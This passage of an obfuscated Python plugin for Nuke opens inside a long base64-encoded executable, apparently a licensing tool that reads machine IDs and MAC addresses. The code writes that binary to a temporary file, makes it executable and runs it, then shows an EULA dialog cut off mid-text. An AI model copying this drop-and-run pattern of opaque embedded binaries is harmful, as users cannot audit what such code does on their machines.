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F9fSkNSX0VORF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABhZXNjcmlwdHNMaWNlbnNlci5jcHAAX1pTdEw4X19pb2luaXQAX1pOOWFlc2NyaXB0c0wxNmJ1Zl90b19oZXhzdHJpbmdFUGhqAF9aTjlhZXNjcmlwdHNMMTZoZXhzdHJpbmdfdG9fYnVmRVBoalMwXwBfWkwxMkJpdF9NYW5nbGVfMWlpaWlpaWkAX1pMMTJCaXRfTWFuZ2xlXzJpaWlpaWlpAF9aTDEyQml0X01hbmdsZV8zaWlpaWlpaQBfWkwxMkJpdF9NYW5nbGVfNGlpaWlpaWkAX1pMMTJCaXRfTWFuZ2xlXzVpaWlpaWlpAF9aTDE0YmxhY2tMaXN0QXJyYXkAX1pMOHNtb2R1bHVzaWkAX1pMOG51bXRvc3RyagBfWkw5bG9uZ3Rvc3RyeQBfWkwxMW51bXRvaGV4c3RyagBfWkw5cGFkRGlnaXRzU3NqAF9aTDhjaHJSZW1hcGNQU3MAX1pMOGtleVJlbWFwalBTc2kAX1pMOWtleVdpemFyZGpqalBQRmlpaWlpaWlpRVBTc2JpAF9aTDE4SXNMaWNlbnNlVHlwZVZhbGlkU3MAX1pMMTFSZW1vdmVTdGVwc1JTc2ppU19TXwBfWkwxNWdldENoZWNrc3VtX29sZFNzU3MAX1pMMTFnZXRDaGVja3N1bVNzU3MAX1pMMTJnZXRWZXJpZkNvZGVTc2oAX1pMMTBnZXREZXRhaWxzUlNzU19TX1NfU18AX1pMMTJnZXRQdWJsaWNLZXlTc2lpAF9aNDFfX3N0YXRpY19pbml0aWFsaXphdGlvbl9hbmRfZGVzdHJ1Y3Rpb25fMGlpAF9HTE9CQUxfX0lfX1pOOWFlc2NyaXB0czEyZ2V0TWFjaGluZUlkRVJBMTI4X2MAX1paTDE4X19ndGhyZWFkX2FjdGl2ZV9wdkUyMF9fZ3RocmVhZF9hY3RpdmVfcHRyAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfX2luaXRfYXJyYXlfZW5kAF9faW5pdF9hcnJheV9zdGFydABfRFlOQU1JQwBkYXRhX3N0YXJ0AF9aTlN0OGlvc19iYXNlNHNldGZFU3QxM19Jb3NfRm10ZmxhZ3NTMF8AX1pOOWFlc2NyaXB0czEzT3V0QXNVbnNpZ25lZEVjAF9aTlNzYVNFUEtjQEBHTElCQ1hYXzMuNABfWk5Tc0MxRXZAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTVjbG9zZUV2QEBHTElCQ1hYXzMuNABfWk5Tc3BMRVBLY0BAR0xJQkNYWF8zLjQAbWVtc2V0QEBHTElCQ18yLjIuNQBfX2xpYmNfY3N1X2ZpbmkAX1pOU3M1Y2xlYXJFdkBAR0xJQkNYWF8zLjQAc2h1dGRvd25AQEdMSUJDXzIuMi41AF9zdGFydABfWlN0cGxJY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRVNiSVRfVDBfVDFfRVJLUzZfUzhfAF9aU3RvclN0MTNfSW9zX0ZtdGZsYWdzU18AX1pOS1NzNnN1YnN0ckVtbUBAR0xJQkNYWF8zLjQAaW9jdGxAQEdMSUJDXzIuMi41AF9aTlNzcExFY0BAR0xJQkNYWF8zLjQAX19nbW9uX3N0YXJ0X18AX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfWk5LU3M1Y19zdHJFdkBAR0xJQkNYWF8zLjQAX1puYW1AQEdMSUJDWFhfMy40AF9aTjE3TUFDQWRkcmVzc1V0aWxpdHkxOEdldEFsbE1BQ0FkZHJlc3Nlc0VQaABfZmluaQBfWk5TaTV0ZWxsZ0V2QEBHTElCQ1hYXzMuNABfWk5LU3M0c2l6ZUV2QEBHTElCQ1hYXzMuNABfWk5TdDhpb3NfYmFzZTRJbml0QzFFdkBAR0xJQkNYWF8zLjQAX1oxOGNoZWNrQmxhY2tMaXN0X29sZGlpAF9fbGliY19zdGFydF9tYWluQEBHTElCQ18yLjIuNQBfWlN0b3JTdDEzX0lvc19PcGVubW9kZVNfAF9aU3Rsc0lTdDExY2hhcl90cmFpdHNJY0VFUlN0MTNiYXNpY19vc3RyZWFtSWNUX0VTNV9oQEBHTElCQ1hYXzMuNABfWk5TaTVzZWVrZ0VsU3QxMl9Jb3NfU2Vla2RpckBAR0xJQkNYWF8zLjQAX1pTdG9SUlN0MTNfSW9zX0ZtdGZsYWdzU18AX1pOU3NDMUVSS1NzQEBHTElCQ1hYXzMuNABfX2N4YV9hdGV4aXRAQEdMSUJDXzIuMi41AF9aTjE3TUFDQWRkcmVzc1V0aWxpdHkxOEdldE1BQ0FkZHJlc3NMaW51eEVQaABfWk5TaTRyZWFkRVBjbEBAR0xJQkNYWF8zLjQAX1oxNGNoZWNrQmxhY2tMaXN0aWlpaQBfWk5LU3M2bGVuZ3RoRXZAQEdMSUJDWFhfMy40AF9aTlN0OGlvc19iYXNlNEluaXREMUV2QEBHTElCQ1hYXzMuNABnZXRwd3VpZEBAR0xJQkNfMi4yLjUAX1pTdGxzSVN0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JY1RfRVM1X1BLY0BAR0xJQkNYWF8zLjQAX1pTdHBsSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVTYklUX1QwX1QxX0VSS1M2X1BLUzNfAF9JT19zdGRpbl91c2VkAF9aTlNvNXdyaXRlRVBLY2xAQEdMSUJDWFhfMy40AF9aTlNzRDFFdkBAR0xJQkNYWF8zLjQAX19kYXRhX3N0YXJ0AF9aTjlhZXNjcmlwdHMxMmdldE1hY2hpbmVJZEVSQTEyOF9jAGJjb3B5QEBHTElCQ18yLjIuNQBzcHJpbnRmQEBHTElCQ18yLjIuNQBfWk5Tc3BMRVJLU3NAQEdMSUJDWFhfMy40AF9aU3Rjb1N0MTNfSW9zX0ZtdGZsYWdzAF9aU3Q3c2V0ZmlsbEljRVN0OF9TZXRmaWxsSVRfRVMxXwBfWlN0M2hleFJTdDhpb3NfYmFzZQBfWjRrZXkxU3NpAGF0b2xAQEdMSUJDXzIuMi41AF9aTjlhZXNjcmlwdHM3Z2V0UGF0aEVTc2JSU3MAX1pOU3NDMUVQS2NSS1NhSWNFQEBHTElCQ1hYXzMuNABfWk45YWVzY3JpcHRzMTdzYXZlTGljZW5zZVRvRmlsZUVQS2NQYwBfWlN0NGNvdXRAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXZAQEdMSUJDWFhfMy40AF9aMTRtYWtlU2VlZHNBcnJheVNzaQBfX2Rzb19oYW5kbGUAX1pTdGFOUlN0MTNfSW9zX0ZtdGZsYWdzU18AX1pOU3NpeEVtQEBHTElCQ1hYXzMuNABfX0RUT1JfRU5EX18AX19saWJjX2NzdV9pbml0AGF0b2lAQEdMSUJDXzIuMi41AF9aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXZAQEdMSUJDWFhfMy40AF9aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlQEBHTElCQ1hYXzMuNABfWk5Tb2xzRWpAQEdMSUJDWFhfMy40AF9aTjlhZXNjcmlwdHMxOWxvYWRMaWNlbnNlRnJvbUZpbGVFUEtjUkExMjhfYwBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU1Y2xvc2VFdkBAR0xJQkNYWF8zLjQAc29ja2V0QEBHTElCQ18yLjIuNQBfWk5LU3Q0ZnBvc0kxMV9fbWJzdGF0ZV90RWN2bEV2AF9aMTNyZXZlcnNlU3RyaW5nU3MAX19ic3Nfc3RhcnQAX1pTdGxzSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzdfUktTYklTNF9TNV9UMV9FQEBHTElCQ1hYXzMuNABzdHJjbXBAQEdMSUJDXzIuMi41AF9aTlNhSWNFRDFFdkBAR0xJQkNYWF8zLjQAc3RyY3B5QEBHTElCQ18yLjIuNQBfWk5TczVlcmFzZUVtbUBAR0xJQkNYWF8zLjQAZ2V0dWlkQEBHTElCQ18yLjIuNQBfWmRhUHZAQEdMSUJDWFhfMy40AHB0aHJlYWRfY2FuY2VsAF9aTlNzNmFwcGVuZEVQS2NAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTdpc19vcGVuRXZAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUMxRVBLY1N0MTNfSW9zX09wZW5tb2RlQEBHTElCQ1hYXzMuNABfZW5kAF9aTlNvbHNFUEZSU29TX0VAQEdMSUJDWFhfMy40AF9aU3Q0c2V0d2kAX1pOU3QxNGJhc2ljX29mc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFQzFFUEtjU3QxM19Jb3NfT3Blbm1vZGVAQEdMSUJDWFhfMy40AF9fY3hhX2VuZF9jYXRjaEBAQ1hYQUJJXzEuMwBfWk5TaXJzRVJtQEBHTElCQ1hYXzMuNABfWlN0NGVuZGxJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfQEBHTElCQ1hYXzMuNABfX2N4YV9iZWdpbl9jYXRjaEBAQ1hYQUJJXzEuMwBfWk5TdDE4YmFzaWNfc3RyaW5nc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVEMUV2QEBHTElCQ1hYXzMuNABfWk5TczlwdXNoX2JhY2tFY0BAR0xJQkNYWF8zLjQAX2VkYXRhAF9aTlNhSWNFQzFFdkBAR0xJQkNYWF8zLjQAX19neHhfcGVyc29uYWxpdHlfdjBAQENYWEFCSV8xLjMAX1pOS1N0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRTNzdHJFdkBAR0xJQkNYWF8zLjQAX1pTdGFuU3QxM19Jb3NfRm10ZmxhZ3NTXwBfVW53aW5kX1Jlc3VtZUBAR0NDXzMuMABfWk5Tc2FTRVJLU3NAQEdMSUJDWFhfMy40AF9aTlNvbHNFUEZSU3Q4aW9zX2Jhc2VTMF9FQEBHTElCQ1hYXzMuNABfWk5TczZhcHBlbmRFUktTc0BAR0xJQkNYWF8zLjQAX1pOOWFlc2NyaXB0czE1dmFsaWRhdGVMaWNlbnNlRVBjaVJOU18xMUxpY2Vuc2VEYXRhRQBfWk5LU3M0ZmluZEVQS2NtQEBHTElCQ1hYXzMuNABfWlN0bHNJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfU3Q1X1NldHdAQEdMSUJDWFhfMy40AF9aU3Rsc0ljU3QxMWNoYXJfdHJhaXRzSWNFRVJTdDEzYmFzaWNfb3N0cmVhbUlUX1QwX0VTNl9TdDhfU2V0ZmlsbElTM19FQEBHTElCQ1hYXzMuNABfWk5TdDE0YmFzaWNfaWZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU3aXNfb3BlbkV2QEBHTElCQ1hYXzMuNABta2RpckBAR0xJQkNfMi4yLjUAbWFpbgBfaW5pdAA=')
return R
raise Exception('unsupported operating system')
def __isMacOs(a):
return bw() == 'Darwin'
def __isWindows(a):
return bw() == 'Windows'
def __a(a):
eV = bw() == 'Linux' and eW()[0] == '32bit'
return eV
def __isLinux64(a):
eX = bw() == 'Linux' and eW()[0] == '64bit'
return eX
class at(object):
"""a commandline tool represented as a binary string. Can be copied to a temp file and executed"""
def __init__(a, eY):
a.binString = eY.decode('base64')
a.filePath = None
return
def execute(a, dk):
a.__createFile()
if not a.filePath:
return
dk.insert(0, a.filePath)
eZ = Popen(dk, stdout=fa, stderr=fa)
s = eZ.communicate()
a.__deleteFile()
return s
def __createFile(a):
fb, filePath = hg(suffix='', prefix='tmp', dir=None, text=False)
file = al.fdopen(fb, 'wb')
file.write(a.binString)
file.close()
al.chmod(filePath, dl.S_IRUSR | dl.S_IWUSR | dl.S_IXUSR)
a.filePath = filePath
return
def __deleteFile(a):
if a.filePath:
al.remove(a.filePath)
a.filePath = None
return
import nuke as b
import nukescripts
import os as al
import MiImageFolder as hi
import webbrowser as fm
# from PySide import QtGui as l
from Qt import QtWidgets as l
def dm():
return dn().exec_()
class dn(l.QDialog):
def __init__(a):
super(dn, a).__init__()
a.eulaText = '<strong>END USER LICENSE AGREEMENT</strong><br>\n \n<p>This software ("the Software Product") and accompanying documentation is licensed and not sold. This Software Product is protected by copyright laws and treaties, as well as laws and treaties related to other forms of intellectual property. The author owns intellectual property rights in the Software Product. The Licensee\'s ("you" or "your") license to download, use, copy, or change the Software Product is subject to these rights and to all the terms and conditions of this End User License Agreement ("Agreement").</p>\n\n<p><strong>Acceptance</strong><br>\nYOU ACCEPT AND AGREE TO BE BOUND BY THE TERMS OF THIS AGREEMENT BY SELECTING THE "ACCEPT" OPTION AND DOWNLOADING THE SOFTWARE PRODUCT OR BY INSTALLING, USING, OR COPYING THE SOFTWARE PRODUCT. YOU MUST AGREE TO ALL OF THE TERMS OF THIS AGREEMENT BEFORE YOU WILL BE ALLOWED TO DOWNLOAD THE SOFTWARE PRODUCT. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT, YOU MUST SELECT "DECLINE" AND YOU MUST NOT INSTALL, USE, OR COPY THE SOFTWARE PRODUCT.\n</p>\n<p><strong>License Grant</strong><br>\nThis Agreement entitles you to install and use one copy of the Software Product. In addition, you may make one archival copy of the Software Product. The archival copy must be on a storage medium other than a hard drive, and may only be used for the reinstallation of the Software Product. This Agreement does not permit the installation or use of multiple copies of the Software Product, or the installation of the Software Product on more than one computer at any given time, on a system that allows shared used of applications, on a multi-user network, or on any configuration or system of computers that allows multiple users. Multiple copy use or installation is only allowed if you obtain an appropriate licensing agreement for each user and each copy of the Software Product.</p>\n\n<p><strong>Restrictions on Transfer</strong><br>\nWithout first obtaining the express written consent of the author, you may not assign your rights and obligations under this Agreement, or redistribute, encumber, sell, rent, lease, sublicense, or otherwise transfer your rights to the Software Product.</p>\n\n<p><strong>Restrictions on Use</strong><br>\nYou may not use, copy, or install the Software Product on any system with more than one computer, or permit the use, copying, or installation of the Software Product by more than one user or on more than one computer. If you hold multiple, validly licensed copies, you may not use, copy, or install the Software Product on any system with more than the number of computers permitted by license, or permit the use, copying, or installation by more users, or on more computers than the number permitted by license.</p>\n\n<p>You may not decompile, "reverse-engineer", disassemble, or otherwise attempt to derive the source code for the Software Product.</p>\n\n<p><strong>Restrictions on Alteration</strong><br>\nYou may not modify the Software Product or create any derivative work of the Software Product or its accompanying documentation. Derivative works include but are not limited to translations. You may not alter any files or libraries in any portion of the Software Product.</p>\n\n<p><strong>Restrictions on Copying</strong><br>\nYou may not copy any part of the Software Product except to the extent that licensed use inherently demands the creation of a temporary copy stored in computer memory and not permanently affixed on storage medium. You may make one archival copy which must be stored on a medium other than a computer hard drive.</p>\n\n<p><strong>Disclaimer of Warranties and Limitation of Liability</strong><br>\nUNLESS OTHERWISE EXPLICITLY AGREED TO IN WRITING BY THE AUTHOR, THE AUTHOR MAKES NO OTHER WARRANTIES, EXPRESS OR IMPLIED, IN FACT OR IN LAW, INCLUDING, BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OTHER THAN AS SET FORTH IN THIS AGREEMENT OR IN THE LIMITED WARRANTY DOCUMENTS PROVIDED WITH THE SOFTWARE PRODUCT.</p>\n\n<p>The author makes no warranty that the Software Product will meet your requirements or operate under your specific conditions of use. The author makes no warranty that operation of the Software Product will be secure, error free, or free from interruption. YOU MUST DETERMINE WHETHER THE SOFTWARE PRODUCT SUFFICIENTLY MEETS YOUR REQUIREMENTS FOR SECURITY AND UNINTERRUPTABILITY. YOU BEAR SOLE RESPONSIBILITY AND ALL LIABILITY FOR ANY LOSS INCURRED DUE TO FAILURE OF THE SOFTWARE PRODUCT TO MEET YOUR REQUIREMENTS. THE AUTHOR WILL NOT, UNDER ANY CIRCUMSTANCES, BE RESPONSIBLE OR LIABLE FOR THE LOSS OF DATA ON ANY COMPUTER OR INFORMATION \nSTORAGE DEVICE.</p>\n\n<p>UNDER NO CIRCUMSTANCES SHALL THE AUTHOR, ITS DIRECTORS, OFFICERS, EMPLOYEES OR AGENTS BE LIABLE TO YOU OR ANY OTHER PARTY FOR INDIRECT, CONSEQUENTIAL, SPECIAL, INCIDENTAL, PUNITIVE, OR EXEMPLARY DAMAGES OF ANY KIND INCLUDING LOST REVENUES OR PROFITS OR LOSS OF BUSINESS) RESULTING FROM THIS AGREEMENT, OR FROM THE FURNISHING, PERFORMANCE, INSTALLATION, OR USE OF THE SOFTWARE PRODUCT, WHETHER DUE TO A BREACH OF CONTRACT, BREACH OF WARRANTY, OR THE NEGLIGENCE OF THE AUTHOR OR ANY OTHER PARTY, EVEN IF THE AUTHOR IS ADVISED BEFOREHAND OF THE POSSIBILITY OF SUCH DAMAGES. TO THE EXTENT THAT THE APPLICABLE JURISDICTION LIMITS THE AUTHOR\'S ABILITY TO DISCLAIM ANY IMPLIED WARRANTIES, THIS DISCLAIMER SHALL BE EFFECTIVE TO THE MAXIMUM EXTENT PERMITTED.</p>\n\n<p><strong>Limitation of Remedies and Damages</strong><br>\nAny claim must be made within the applicable warranty period. All warranties cover only defects arising under normal use and do not include malfunctions or failure resulting from misuse, abuse, neglect, alteration, problems with electrical power, acts of nature, unusual temperatures or humidity, improper installation, or damage determined by the author to have been caused by you. All limited warranties on the Software Product are granted only to you and are non-transferable. You agree to indemnify and hold the author harmless from all claims, judgments, liabilities, expenses, or costs arising from your breach of this Agreement and/or acts or omissions.</p>\n\n<p><strong>Governing Law, Jurisdiction and Costs</strong><br>\nThis Agreement is governed by the laws of Washington, without regard to Washington\'s conflict or choice of law provisions.</p>\n\n<p><strong>Severability</strong><br>\nIf any provision of this Agreement shall be held to be invalid or unenforceable, the 